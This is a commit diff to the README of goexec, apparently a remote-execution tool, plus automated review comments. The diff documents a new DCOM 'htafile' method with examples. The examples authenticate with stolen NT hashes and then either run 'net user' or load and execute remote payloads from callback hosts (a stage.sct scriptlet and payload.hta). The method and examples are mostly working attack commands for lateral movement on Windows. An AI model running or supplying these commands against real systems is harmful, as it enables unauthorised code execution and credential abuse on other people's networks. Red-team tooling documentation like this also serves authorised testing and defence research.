
Commit 0c0a1d0

docs: +htafile info,examples
1 parent 8da86fa commit 0c0a1d0

1 file changed

Lines changed: 48 additions & 0 deletions

File tree

README.md

@@ -207,6 +207,7 @@ Available Commands:
207207
mmc Execute with the MMC20.Application DCOM object
208208
shellwindows Execute with the ShellWindows DCOM object
209209
shellbrowserwindow Execute with the ShellBrowserWindow DCOM object
210+
htafile Execute with the HTAFile DCOM object
210211
211212
... [inherited flags] ...
212213
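Review bot: the new summary line names the object the "HTAFile DCOM object", while the method section added further down in this same patch introduces it as "the exposed HTML Application object"; use one name in both places, and state the class it refers to the way the neighbouring entries do (e.g. `MMC20.Application`, `ShellWindows`), so a reader can map the command to the object documented below.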
@@ -334,6 +335,53 @@ goexec dcom shellbrowserwindow "$target" \
334335
--app-window 3
335336
```
336337

338+
#### `htafile` Method (`dcom htafile`)
339+
340+
The `htafile` method uses the exposed HTML Application object to call [`IPersistMoniker.Load`](https://learn.microsoft.com/en-us/previous-versions/aa458529(v=msdn.10)) with a client-supplied [URL moniker](https://learn.microsoft.com/en-us/openspecs/office_file_formats/ms-oshared/4948a119-c4e4-46b6-9609-0525118552e8). The URL can point to a URL of any format supported by `mshta.exe`.
341+
342+
```text
343+
Usage:
344+
goexec dcom htafile [target] [flags]
345+
346+
Execution:
347+
-U, --url URL Load custom URL
348+
--js string Execute JavaScript one-liner
349+
--vbs string Execute VBScript one-liner
350+
-e, --exec executable Remote Windows executable to invoke
351+
-a, --args string Process command line arguments
352+
-c, --command string Windows process command line (executable & arguments)
353+
-o, --out file Fetch execution output to file or "-" for standard output
354+
-m, --out-method string Method to fetch execution output (default "smb")
355+
--out-timeout duration Output timeout duration (default 1m0s)
356+
--no-delete-out Preserve output file on remote filesystem
357+
358+
... [inherited flags] ...
359+
```
360+
361+
##### Examples
362+
363+
```shell
364+
# Execute `net user` + print output
365+
goexec dcom htafile "$target" \
366+
--user "${auth_user}@${domain}" \
367+
--password "$auth_pass" \
368+
--command 'net user' \
369+
--out -
370+
371+
# Execute blind WSH JavaScript one-liner using admin NT hash
372+
goexec dcom htafile "$target" \
373+
--user "${auth_user}@${domain}" \
374+
--nt-hash "$auth_nt" \
375+
--js 'GetObject("script:http://10.0.0.10:8001/stage.sct").Exec();close()'
376+
377+
# Execute remote HTA file using admin NT hash
378+
goexec dcom htafile "$target" \
379+
--user "${auth_user}@${domain}" \
380+
--nt-hash "$auth_nt" \
381+
--url "http://callback.lan/payload.hta"
382+
```
383+
384+
337385
### Task Scheduler Module (`tsch`)
338386

339387
The `tsch` module makes use of the Windows Task Scheduler service ([MS-TSCH](https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/)) to spawn processes on the remote target.
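Review bot: the introductory sentence of the new section reads "The URL can point to a URL of any format supported by `mshta.exe`", which is circular; suggest "The URL may use any scheme that `mshta.exe` accepts". The flag listing also does not say how `--url`, `--js`/`--vbs` and `--exec`/`--args`/`--command` relate (are they mutually exclusive ways to supply the payload, and does `--url` bypass the `--out` output fetch?); a sentence on that, plus a note that output collection over the default `smb` method writes a file on the target that is removed unless `--no-delete-out` is given, would make the usage block self-explanatory. Minor: the second example hard-codes `10.0.0.10:8001` while the third uses `callback.lan`; a consistent placeholder host would read better.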
